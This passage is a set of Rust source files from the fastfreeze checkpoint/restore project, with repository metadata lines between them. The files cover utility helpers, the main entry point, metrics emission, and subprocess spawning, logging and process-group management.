nix::errno::Errno::result(res) .with_context(|| format!("Failed to raise ambient cap {}", cap)) .map(drop) } pub fn find_lib(lib_name: impl AsRef<Path>) -> Result<PathBuf> { // We could do a more efficient implementation, but it hurts readability, // but we don't do it, because we like readability more. let lib_name = lib_name.as_ref(); let mut search_paths = vec![]; if let Some(ld_library_paths) = env::var_os("LD_LIBRARY_PATH") { search_paths.extend(env::split_paths(&ld_library_paths)); } search_paths.extend(LIB_SEARCH_PATHS.iter().map(PathBuf::from)); for base_path in search_paths { let path = base_path.join(lib_name); if path.exists() { return Ok(path.canonicalize()?); } } bail!("Failed to find {}. Try adding its directory to LD_LIBRARY_PATH", lib_name.display()); } pub fn atomic_symlink(from: impl AsRef<Path>, to: impl AsRef<Path>) -> Result<()> { use std::os::unix::fs::symlink; // An awkward way to do `format!("{}.tmp", to)` but with OsString let mut to_tmp = OsString::from(to.as_ref()); to_tmp.push(".tmp"); symlink(from, &to_tmp)?; fs::rename(&to_tmp, to) .map_err(|e| { let _ = fs::remove_file(&to_tmp); e })?; Ok(()) } pub fn set_tmp_like_permissions(from: impl AsRef<Path>) -> Result<()> { fs::set_permissions(from.as_ref(), Permissions::from_mode(0o1777)) .with_context(|| format!("Failed to chmod 1777 {}", from.as_ref().display())) } pub fn get_home_dir() -> Option<PathBuf> { // It is said to be deprecated, but it's fine on Linux. #[allow(deprecated)] std::env::home_dir() .and_then(|h| if h.to_string_lossy().is_empty() { None } else { Some(h) }) } pub trait JsonMerge { fn merge(self, b: Value) -> Self; } impl JsonMerge for Value { fn merge(self, b: Value) -> Self { match (self, b) { (Value::Object(mut a), Value::Object(b)) => { a.extend(b); Value::Object(a) } _ => panic!() } } } pub trait UrlExt { fn raw_join(&self, file: &str) -> Url; } impl UrlExt for Url { fn raw_join(&self, file: &str) -> Url { // `Url` provides a join() method, but tries to be too smart let mut url = self.clone(); url.path_segments_mut() .expect("URL base error") .push(file); url } } #[test] fn url_join_test() -> Result<()> { let url = Url::parse("s3://bucket_name/dir/image_name")?; assert_eq!(url.raw_join("file").as_str(), "s3://bucket_name/dir/image_name/file"); let url = Url::parse("s3://bucket_name/image_name")?; assert_eq!(url.raw_join("file").as_str(), "s3://bucket_name/image_name/file"); let url = Url::parse("s3://bucket_name/")?; assert_eq!(url.raw_join("file").as_str(), "s3://bucket_name/file"); let url = Url::parse("s3://bucket_name")?; assert_eq!(url.raw_join("file").as_str(), "s3://bucket_name/file"); Ok(()) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/main.rs
src/main.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. pub mod logger; pub mod util; pub mod process; pub mod cli; pub mod store; pub mod image; pub mod virt; pub mod metrics; pub mod consts; pub mod criu; pub mod filesystem; pub mod image_streamer; pub mod lock; pub mod signal; pub mod container; #[macro_use] extern crate anyhow; #[macro_use] extern crate log; #[macro_use] extern crate lazy_static; #[macro_use] extern crate serde_json; use anyhow::Result; use logger::is_logger_ready; use structopt::StructOpt; use crate::{ consts::*, cli::{ExitCode, CLI}, virt::disable_local_time_virtualization, signal::trap_sigterm_and_friends, }; fn main() { fn do_main() -> Result<()> { // We have to be exempt from time virtualization because we use // `Instant::now()`, which uses CLOCK_MONOTONIC. // disable_local_time_virtualization() does an execve() if needed. disable_local_time_virtualization()?; // START_TIME is used for logging purposes lazy_static::initialize(&START_TIME); // Trapping signals is important for cleanups (e.g., kill children) before we exit trap_sigterm_and_friends()?; let opts = cli::Opts::from_args(); opts.init_logger()?; opts.run() } if let Err(e) = do_main() { if is_logger_ready() { error!("{:#}", e); } else { eprintln!("{:#}", e); } let exit_code = ExitCode::from_error(&e); if exit_code == EXIT_CODE_RESTORE_FAILURE { log::error!("You may try again with --no-restore to run the application from scratch"); } std::process::exit(exit_code as i32); } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/metrics.rs
src/metrics.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ ffi::OsString, time::Instant, }; use crate::{ consts::*, process::{Process, Command, ProcessError, ProcessGroupError}, util::JsonMerge, }; use serde_json::Value; lazy_static! { static ref METRICS_RECORDER_PATH: Option<OsString> = std::env::var_os("FF_METRICS_RECORDER"); static ref ARGS_JSON: Value = serde_json::to_value(std::env::args().collect::<Vec<String>>()) .expect("Failed to serialize CLI arguments into json"); } pub fn emit_metrics(event: Value) -> Result<Option<Process>> { let metrics_recorder_path = match METRICS_RECORDER_PATH.as_ref() { Some(path) => path, None => return Ok(None), }; let payload = json!({ "invocation_id": *INVOCATION_ID, "elapsed_time": START_TIME.elapsed().as_secs_f64(), "cli_args": *ARGS_JSON, }).merge(event); let p = Command::new_shell(&metrics_recorder_path) .arg(&serde_json::to_string(&payload)?) .show_cmd_on_spawn(log_enabled!(log::Level::Trace)) .spawn() .context("Failed to spawn the metrics program")?; Ok(Some(p)) } pub fn with_metrics_raw<F,M,R>(action: &str, f: F, metrics_f: M) -> Result<R> where F: FnOnce() -> Result<R>, M: Fn(&Result<R>) -> Value { if METRICS_RECORDER_PATH.is_none() { return f(); } let start_time = Instant::now(); let result = f(); let event = json!({ "action": action, "duration": start_time.elapsed().as_secs_f64(), }).merge(metrics_f(&result)); // If the metrics CLI fails, we don't return the error to the caller. // Instead, we log the error and move on. emit_metrics(event)?.map(|p| p.reap_on_drop()); result } pub fn with_metrics<F,M,R>(action: &str, f: F, metrics_f: M) -> Result<R> where F: FnOnce() -> Result<R>, M: Fn(&R) -> Value { with_metrics_raw(action, f, |result| match result { Ok(result) => json!({ "outcome": "success", }).merge(metrics_f(result)), Err(e) => json!({ "outcome": "error", "error": format!("{:#}", e), }).merge(metrics_error_json(e)), } ) } pub fn metrics_error_json(e: &anyhow::Error) -> Value { if let Some(e) = e.downcast_ref::<ProcessError>() { json!({"process": e.to_json()}) } else if let Some(e) = e.downcast_ref::<ProcessGroupError>() { json!({"process": e.to_json()}) } else { json!({}) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/stderr_logger.rs
src/process/stderr_logger.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Error}; use std::{ borrow::Cow, os::unix::io::{AsRawFd, RawFd}, collections::VecDeque, io::{BufReader, BufRead, ErrorKind}, }; use nix::{ fcntl::OFlag, fcntl::{fcntl, FcntlArg}, }; pub use std::process::{ ExitStatus, Stdio, ChildStdin, ChildStdout, ChildStderr, Output as StdOutput, Child }; use crate::{ consts::*, }; // We create our own `Child` wrapper to provide better error context. // We further expose a slightly different API than what is offered from the stdlib. // to incorporate SIGTERM monitoring, and helpful error messages pub struct StderrReader { reader: BufReader<ChildStderr>, pub fd: RawFd, } impl StderrReader { pub fn new(stderr: ChildStderr) -> Self { let fd = stderr.as_raw_fd(); let reader = BufReader::new(stderr); let mut self_ = Self { reader, fd }; self_.set_blocking(false); self_ } pub fn set_blocking(&mut self, blocking: bool) -> &mut Self { let flag = if blocking { OFlag::empty() } else { OFlag::O_NONBLOCK }; fcntl(self.fd, FcntlArg::F_SETFL(flag)) .expect("Failed to fcntl() on stderr"); self } pub fn drain(&mut self, tail: &mut StderrTail) -> Result<()> { // Read all lines until we reach an -EAGAIN // Each line is emitted to the logs, and saved into the backlog let mut line = String::new(); loop { // XXX there's no bounds on the line size. If we don't get a "\n" // when reading stderr, we can blow up in memory utilization. // It's a risk we are willing to take, given that we assume the // programs we run (tar, criu) are well behaved. match self.reader.read_line(&mut line) { Err(err) if err.kind() == ErrorKind::WouldBlock => break, Err(err) => bail!(self.format_read_error(anyhow!(err), &tail.log_prefix, &line)), Ok(0) => break, // Reached EOF Ok(_) => tail.log_line(&line), } line.clear(); } Ok(()) } fn format_read_error(&self, err: Error, log_prefix: &str, line: &str) -> Error { let mut e = anyhow!(err).context( format!("Failed to read stderr from `{}`", log_prefix)); if !line.is_empty() { e = e.context(format!("Partial stderr read : `{}`", line)); } e } } #[derive(Clone, Debug)] pub struct StderrTail { pub log_prefix: Cow<'static, str>, /// We buffer the last few lines of stderr so that we can emit metrics with the /// stderr of the process. pub tail: VecDeque<Box<str>>, } impl StderrTail { pub fn new(log_prefix: Cow<'static, str>) -> Self { let tail = VecDeque::with_capacity(STDERR_TAIL_NUM_LINES); Self { log_prefix, tail } } fn log_line(&mut self, line: &str) { let line = line.trim(); if line.is_empty() { return; } info!("{}> {}", self.log_prefix, line); if self.tail.len() == self.tail.capacity() { self.tail.pop_front(); } self.tail.push_back(line.into()); } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/command.rs
src/process/command.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ borrow::Cow, io::Result as IoResult, os::unix::io::AsRawFd, ffi::{OsString, OsStr}, collections::HashMap, process::Command as StdCommand, os::unix::process::CommandExt, }; use nix::{ fcntl::{fcntl, FcntlArg, FdFlag, OFlag}, }; use crate::util::Pipe; use super::Process; // We re-export these, as they are part of our API pub use std::process::{ ExitStatus, Stdio, ChildStdin, ChildStdout, ChildStderr, Output }; pub type EnvVars = HashMap<OsString, OsString>; // We wrap the standard library `Command` to provide additional features: // * Logging of the command executed, and failures // * setpgrp() // We have to delegate a few methods to the inner `StdCommand`, which makes it a bit verbose. // We considered the subprocess crate, but it wasn't very useful, and it lacked // the crucial feature of pre_exec() that the standard library has for doing setpgrp(). pub struct Command { inner: StdCommand, display_args: Vec<String>, show_cmd_on_spawn: bool, stderr_log_prefix: Option<Cow<'static, str>>, } impl Command { pub fn new<I: IntoIterator<Item = S>, S: AsRef<OsStr>>(args: I) -> Self { let mut args = args.into_iter(); let program = args.next().unwrap(); // unwrap() is fine as we never pass empty args let mut cmd = Self { inner: StdCommand::new(&program), display_args: vec![Self::arg_for_display(&program)], show_cmd_on_spawn: true, stderr_log_prefix: None, }; cmd.args(args); cmd } pub fn new_shell<S: AsRef<OsStr>>(script: S) -> Self { // We use bash for pipefail support let mut inner = StdCommand::new("/bin/bash"); inner.arg("-o").arg("pipefail") .arg("-c").arg(&script) .arg("--"); Self { inner, display_args: vec![Self::arg_for_display(&script)], show_cmd_on_spawn: true, stderr_log_prefix: None, } } pub fn arg<S: AsRef<OsStr>>(&mut self, arg: S) -> &mut Self { self.display_args.push(Self::arg_for_display(&arg)); self.inner.arg(&arg); self } pub fn arg_for_display<S: AsRef<OsStr>>(arg: S) -> String { arg.as_ref().to_string_lossy().into_owned() } pub fn args<I: IntoIterator<Item = S>, S: AsRef<OsStr>>(&mut self, args: I) -> &mut Self { for arg in args { self.arg(arg); } self } pub fn set_child_subreaper(&mut self) -> &mut Self { let pre_exec_fn = || { let res = unsafe { libc::prctl(libc::PR_SET_CHILD_SUBREAPER) }; if let Err(e) = nix::errno::Errno::result(res) { error!("Failed to set PR_SET_CHILD_SUBREAPER, proceeding anyways: {}", e); } Ok(()) }; unsafe { self.pre_exec(pre_exec_fn) } } pub fn show_cmd_on_spawn(&mut self, value: bool) -> &mut Self { self.show_cmd_on_spawn = value; self } pub fn spawn(&mut self) -> Result<Process> { let display_cmd = self.display_args.join(" "); let inner = self.inner.spawn() .with_context(|| format!("Failed to spawn `{}`", display_cmd))?; if self.show_cmd_on_spawn { debug!("+ {}", display_cmd); } Ok(Process::new(inner, display_cmd, self.stderr_log_prefix.clone())) } pub fn exec(&mut self) -> Result<()> { bail!(self.inner.exec()) } /// `enable_stderr_logging` enables two things: /// 1) stderr is emitted via our logging facilities (info!()). /// log lines are prefixed with `log_prefix`. /// 2) A fixed sized backlog is kept, and included in the error message. /// The process' stderr is drained when calling try_wait(), wait(), or drain_stderr_logger(). pub fn enable_stderr_logging<S>(&mut self, log_prefix: S) -> &mut Command where S: Into<Cow<'static, str>> { self.stderr_log_prefix = Some(log_prefix.into()); // We'd also like to redirect stdout to stderr in some cases. // But I can't find a way to do this in a simple way with the Rust std library. self.stderr(Stdio::piped()); self } } // These are delegates to the inner `StdCommand`. impl Command { pub fn env<K: AsRef<OsStr>, V: AsRef<OsStr>>(&mut self, key: K, val: V) -> &mut Command { self.inner.env(key, val); self } pub fn envs<I: IntoIterator<Item = (K, V)>, K: AsRef<OsStr>, V: AsRef<OsStr>>(&mut self, vars: I) -> &mut Command { self.inner.envs(vars); self } pub fn env_remove<K: AsRef<OsStr>>(&mut self, key: K) -> &mut Command { self.inner.env_remove(key); self } pub fn env_clear(&mut self) -> &mut Command { self.inner.env_clear(); self } pub fn stdin<T: Into<Stdio>>(&mut self, cfg: T) -> &mut Command { self.inner.stdin(cfg); self } pub fn stdout<T: Into<Stdio>>(&mut self, cfg: T) -> &mut Command { self.inner.stdout(cfg); self } pub fn stderr<T: Into<Stdio>>(&mut self, cfg: T) -> &mut Command { self.inner.stderr(cfg); self } #[allow(clippy::missing_safety_doc)] pub unsafe fn pre_exec<F>(&mut self, f: F) -> &mut Command where F: FnMut() -> IoResult<()> + Send + Sync + 'static { self.inner.pre_exec(f); self } } pub trait PipeCommandExt: Sized { /// Create a new pipe input (e.g., stdin). fn new_input() -> Result<Self>; /// Create a new pipe output (e.g., stdout, stderr) fn new_output() -> Result<Self>; } impl PipeCommandExt for Pipe { fn new_input() -> Result<Self> { let pipe = Self::new(OFlag::empty())?; fcntl(pipe.write.as_raw_fd(), FcntlArg::F_SETFD(FdFlag::FD_CLOEXEC))?; Ok(pipe) } fn new_output() -> Result<Self> { let pipe = Self::new(OFlag::empty())?; fcntl(pipe.read.as_raw_fd(), FcntlArg::F_SETFD(FdFlag::FD_CLOEXEC))?; Ok(pipe) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/process.rs
src/process/process.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ borrow::Cow, os::unix::io::RawFd, time::{Duration, Instant}, }; use nix::{ sys::signal::{self, Signal}, unistd::Pid, }; pub use std::process::{ ExitStatus, Stdio, ChildStdin, ChildStdout, ChildStderr, Output as StdOutput, Child }; use crate::signal::{check_for_pending_sigterm, retry_on_interrupt}; use super::{ stderr_logger::{StderrReader, StderrTail}, ProcessError, }; // We create our own `Child` wrapper to provide better error context. // We further expose a slightly different API than what is offered from the stdlib. // to incorporate SIGTERM monitoring, and helpful error messages pub struct Process { inner: Child, display_cmd: String, stderr_reader: Option<StderrReader>, stderr_tail: Option<StderrTail>, } impl Process { pub fn new(mut inner: Child, display_cmd: String, stderr_log_prefix: Option<Cow<'static, str>>) -> Self { let stderr_reader = stderr_log_prefix.as_ref().map(|_| StderrReader::new(inner.stderr.take().expect("stderr not captured")) ); let stderr_tail = stderr_log_prefix.map(StderrTail::new); Self { inner, display_cmd, stderr_reader, stderr_tail } } pub fn pid(&self) -> i32 { self.inner.id() as i32 } pub fn kill(&self, signal: Signal) -> Result<()> { signal::kill(Pid::from_raw(self.pid()), signal) .with_context(|| format!("Failed to signal pid={}", self.pid())) } pub fn try_wait(&mut self) -> Result<Option<ExitStatus>> { check_for_pending_sigterm()?; let result = self.inner.try_wait() .with_context(|| format!("wait(pid={}) failed", self.pid())); self.drain_stderr(false)?; result } fn drain_stderr(&mut self, finalize: bool) -> Result<()> { if let Some(stderr_reader) = self.stderr_reader.as_mut() { // expect() is fine. We should always have a tail (see in new()). let tail = self.stderr_tail.as_mut().expect("stderr tail is missing"); if finalize { stderr_reader.set_blocking(true); stderr_reader.drain(tail)?; self.stderr_reader = None; } else { stderr_reader.drain(tail)?; } } Ok(()) } pub fn wait(&mut self) -> Result<ExitStatus> { retry_on_interrupt(|| { check_for_pending_sigterm()?; // We wait for the process to exit, but at the same time we must // drain its stderr. It's a bit painful to do it well with POSIX. // Instead, we'll make a blocking stderr read. // XXX We make the assumption that the process doesn't leak its // stderr to another process. Otherwise, we could be blocking forever, // even though the process has died. self.drain_stderr(true)?; // true means read_all the stderr and close self.inner.wait() .with_context(|| format!("wait(pid={}) failed", self.pid())) }) } pub fn wait_timeout(&mut self, until: Instant) -> Result<Option<ExitStatus>> { loop { if let Some(exit_status) = self.try_wait()? { return Ok(Some(exit_status)); } if Instant::now() > until { return Ok(None); } std::thread::sleep(Duration::from_millis(100)); } } pub fn wait_for_success(&mut self) -> Result<()> { let exit_status = self.wait()?; // We do clones, and that seems inefficient, but that simplifies the error // code compared to having an Rc<>. This code path is not performance critical ensure_successful_exit_status( exit_status, self.display_cmd.clone(), self.stderr_tail.clone(), ) } pub fn wait_with_output(self) -> Result<Output> { let Process { display_cmd, inner, stderr_reader, stderr_tail: _ } = self; assert!(stderr_reader.is_none(), "stderr logging is not supported when using wait_with_output()"); // FIXME `wait_with_output()` can read from stderr, and stdout and // ignore if we received a SIGTERM. That's because `read_to_end()` is // used internally, and ignores EINTR. // That means that we won't act on SIGTERM. check_for_pending_sigterm()?; let result = inner.wait_with_output()?; Ok(Output { status: result.status, stdout: result.stdout, stderr: result.stderr, display_cmd, }) } pub fn stderr_logger_fd(&self) -> Option<RawFd> { self.stderr_reader.as_ref().map(|r| r.fd) } pub fn reap_on_drop(self) -> ProcessDropReaper { ProcessDropReaper { inner: self } } // In the following, unwrap() is okay. It would be a logic error to access // these without having setup the corresponding pipe. pub fn stdin(&mut self) -> &mut ChildStdin { self.inner.stdin.as_mut().unwrap() } pub fn stdout(&mut self) -> &mut ChildStdout { self.inner.stdout.as_mut().unwrap() } pub fn stderr(&mut self) -> &mut ChildStderr { self.inner.stderr.as_mut().unwrap() } pub fn take_stdin(&mut self) -> Option<ChildStdin> { self.inner.stdin.take() } } pub struct ProcessDropReaper { inner: Process, } impl Drop for ProcessDropReaper { fn drop(&mut self) { // If the process fails, we log the error and move on. let _ = self.inner.wait_for_success() .map_err(|e| error!("{}", e)); } } pub struct Output { pub status: ExitStatus, pub stdout: Vec<u8>, pub stderr: Vec<u8>, pub display_cmd: String, } impl Output { pub fn ensure_success(&self) -> Result<()> { ensure_successful_exit_status(self.status, self.display_cmd.clone(), None) } pub fn ensure_success_with_stderr_log(&self, log_prefix: Cow<'static, str>) -> Result<()> { if self.status.success() { Ok(()) } else { let stderr_tail = String::from_utf8_lossy(&self.stderr) .lines() .map(Into::into) .collect(); bail!(ProcessError { exit_status: self.status, display_cmd: self.display_cmd.clone(), stderr_tail: Some(StderrTail { log_prefix, tail: stderr_tail }), }); } } } fn ensure_successful_exit_status( exit_status: ExitStatus, display_cmd: String, stderr_tail: Option<StderrTail> ) -> Result<()> { if exit_status.success() { Ok(()) } else { bail!(ProcessError { exit_status, display_cmd, stderr_tail }) } } #[cfg(test)] mod test { use super::*; use super::super::*; #[test] fn test_shell() -> Result<()> { let mut cmd = Command::new_shell("exit `echo 33`").spawn()?; let err_msg = cmd.wait_for_success().unwrap_err().to_string(); dbg!(&err_msg); assert!(err_msg.contains("exit `echo 33`")); assert!(err_msg.contains("exit_code=33")); Ok(()) } #[test] fn test_args() -> Result<()> { let out = Command::new(&["echo", "-n", "hello"]) .stdout(Stdio::piped()) .spawn()? .wait_with_output()? .stdout; assert_eq!(String::from_utf8_lossy(&out), "hello"); Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/spawn_with_pid.rs
src/process/spawn_with_pid.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::{ time::Duration, io::Error as IoError, fs, }; use crate::consts::*; use super::{Command, Process}; // At times, we wish to spawn a process with a desired PID. // We do so when running the application from scratch. /// When the child fails, it can only provide an i32 errno to the parent as /// information with the current pre_exec() from the Rust stdlib. const BAD_PID_ERRNO: i32 = 0x0BAD_71D0; /// `MIN_PID` is the pid Linux gives to a process when it wraps around PID_MAX pub const MIN_PID: i32 = 300; pub trait CommandPidExt { fn spawn_with_pid(self, pid: i32) -> Result<Process>; } impl CommandPidExt for Command { /// Spawns the command with the desired PID. /// Note: we consume self because we mutate it, and it would be unsound to /// call `spawn()` again on it. fn spawn_with_pid(mut self, pid: i32) -> Result<Process> { unsafe { self.pre_exec(move || if std::process::id() as i32 != pid { Err(IoError::from_raw_os_error(BAD_PID_ERRNO)) } else { Ok(()) } ); } set_ns_last_pid(pid-1)?; self.spawn().map_err(|e| { if let Some(e) = e.downcast_ref::<IoError>() { if e.raw_os_error() == Some(BAD_PID_ERRNO) { return anyhow!( "Failed to spawn process with pid={}. \ This happens when other processes are being spawn simultaneously. \ The `--on-app-ready` hook can be useful to run programs once safe to do.", pid); } } e }) } } pub fn set_ns_last_pid(pid: i32) -> Result<()> { // The fork hack doesn't work when the requested pid is lower than MIN_PID=300 ensure!(pid >= MIN_PID, "Cannot set pid lower than {}", MIN_PID); Command::new(&["set_ns_last_pid", &pid.to_string()]) .spawn()? .wait_for_success() } pub fn spawn_set_ns_last_pid_server() -> Result<Process> { match fs::remove_file(&*NS_LAST_PID_SOCK_PATH) { Err(e) if e.kind() == std::io::ErrorKind::NotFound => {}, Err(e) => bail!(e), Ok(_) => {}, } let mut process = Command::new(&["set_ns_last_pid"]) .arg(&*NS_LAST_PID_SOCK_PATH) .spawn()?; while !NS_LAST_PID_SOCK_PATH.exists() { if process.try_wait()?.is_some() { process.wait_for_success()?; bail!("set_ns_last_pid exited"); } std::thread::sleep(Duration::from_millis(100)); } Ok(process) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/process_group.rs
src/process/process_group.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ os::unix::io::AsRawFd, io::{ErrorKind, Read}, time::{Duration, Instant}, fs, iter, }; use nix::{ poll::{PollFd, PollFlags}, fcntl::OFlag, sys::signal, }; use crate::{ consts::*, util::{poll_nointr, Pipe}, }; use super::{Process, ProcessError, ProcessGroupError}; /// `ProcessGroup` is used for monitoring a group of processes. /// When dropped, the whole group is killed, except non-killable children. pub struct ProcessGroup { /// We use a pipe to process SIGCHLD, because at some point we need to select() /// on a pipe and watch for children to fail simultaneously. sigchld_pipe: fs::File, /// The list of children. It is used in append only mode. Children are never /// removed or reordered. This is important for the integrity of `ProcessHandle`. children: Vec<ProcessMembership>, /// When `ProcessGroup` is dropped, it sends a SIGTERM to the remaining /// killable children. After kill_grace_period has elapsed, it sends a SIGKILL. kill_grace_period: Duration, /// Something to remember for unregistering the sigchld_pipe SIGCHLD. sig_hook_id: Option<signal_hook::SigId>, } pub struct ProcessMembership { inner: Process, /// Once a process has exited, we no longer poll its status. /// We keep the process around because of the get_mut() API. exited: bool, /// When the process is marked as killable, it means that the process monitor /// can kill it on drop(). This is useful to make CRIU immune to kills as it /// could leave the application in a bad state. killable: bool, /// When the process is marked as daemon, it means that the process monitor /// won't wait for this process to exit in wait_for_success(). daemon: bool, } /// `ProcessHandle` represents a specific child. It contains the index of the /// child located in the `children` array. The handle is returned by `add()`, and /// used in `get_mut()`. #[derive(Clone, Copy, Debug)] pub struct ProcessHandle(usize); impl From<Process> for ProcessMembership { fn from(inner: Process) -> Self { Self { inner, exited: false, killable: true, daemon: false } } } impl ProcessMembership { pub fn non_killable(self) -> Self { Self { killable: false, ..self } } pub fn daemon(self) -> Self { Self { daemon: true, ..self } } } impl ProcessGroup { pub fn new() -> Result<Self> { Self::with_kill_grace_period(Duration::from_secs(KILL_GRACE_PERIOD_SECS)) } pub fn with_kill_grace_period(kill_grace_period: Duration) -> Result<Self> { let pipe = Pipe::new(OFlag::O_CLOEXEC | OFlag::O_NONBLOCK)?; let sig_hook_id = Some(signal_hook::low_level::pipe::register( signal_hook::consts::SIGCHLD, pipe.write) .context("Failed to register signal")?); Ok(Self { sigchld_pipe: pipe.read, children: Vec::new(), kill_grace_period, sig_hook_id, }) } pub fn add(&mut self, proc: impl Into<ProcessMembership>) -> ProcessHandle { self.children.push(proc.into()); ProcessHandle(self.children.len() - 1) } pub fn get_mut(&mut self, id: ProcessHandle) -> &mut Process { &mut self.children[id.0].inner } fn drain_sigchld_pipe(&mut self) { // Discard the content of the pipe let mut vec = Vec::new(); match self.sigchld_pipe.read_to_end(&mut vec) { Err(e) if e.kind() == ErrorKind::WouldBlock => {} result => { result.expect("SIGCHLD pipe has draining issues"); } } } /// Returns an error if a process has exited with a failure. /// Return Ok(true) if some children are remaining, Ok(false) otherwise. pub fn try_wait_for_success(&mut self) -> Result<bool> { self.drain_sigchld_pipe(); // We join the error messages of all errored children. // This is useful when running pipe-connected processes like // "A | B" where both processes are dependent on the other. // When one dies, the other dies too. But we don't know which // one died first. So we report both errors. let mut errors = Vec::new(); for child in &mut self.children { if child.inner.try_wait()?.is_some() { // has child exited ? child.exited = true; if let Err(err) = child.inner.wait_for_success() { // has child errored ? errors.push(err.downcast::<ProcessError>()?); } } } if !errors.is_empty() { bail!(ProcessGroupError { errors }); } Ok(self.children.iter().any(|c| !c.exited && !c.daemon)) } pub fn poll_fds(&self) -> Vec<PollFd> { // Collect all the fd of the stderr that we should be monitoring // with the fd of the sigchld. Drainage of stderrs happens in // child.inner.try_wait() within try_wait_for_success(). self.children.iter() .filter_map(|c| c.inner.stderr_logger_fd()) .chain(iter::once(self.sigchld_pipe.as_raw_fd())) .map(|fd| PollFd::new(fd, PollFlags::POLLIN)) .collect() } pub fn wait_for_success(&mut self) -> Result<()> { while self.try_wait_for_success()? { let timeout = -1; poll_nointr(&mut self.poll_fds(), timeout) .context("Failed to poll()")?; } Ok(()) } pub fn terminate(&mut self) -> Result<()> { // Step 1: SIGTERM all killable children let mut killables = self.children.iter_mut() .filter(|c| c.killable && !c.exited) .collect::<Vec<_>>(); for child in &mut killables { if child.inner.try_wait()?.is_none() { // try_wait() returned none, so the child is not reaped (it is // potentially in a zombie state), and thus kill() should not fail. child.inner.kill(signal::SIGTERM)?; } } // Step 2: SIGKILL all killable children that haven't exited // within the kill_grace_period. let deadline = Instant::now() + self.kill_grace_period; for child in &mut killables { if child.inner.wait_timeout(deadline)?.is_none() { // kill() should not fail as the child is still not reaped child.inner.kill(signal::SIGKILL)?; } } // Step 3: wait for all children to exit, including non-killable // children. for child in &mut self.children { child.inner.wait()?; child.exited = true; } // Cleanup the SIGCHLD hook. if let Some(sig_hook_id) = self.sig_hook_id.take() { 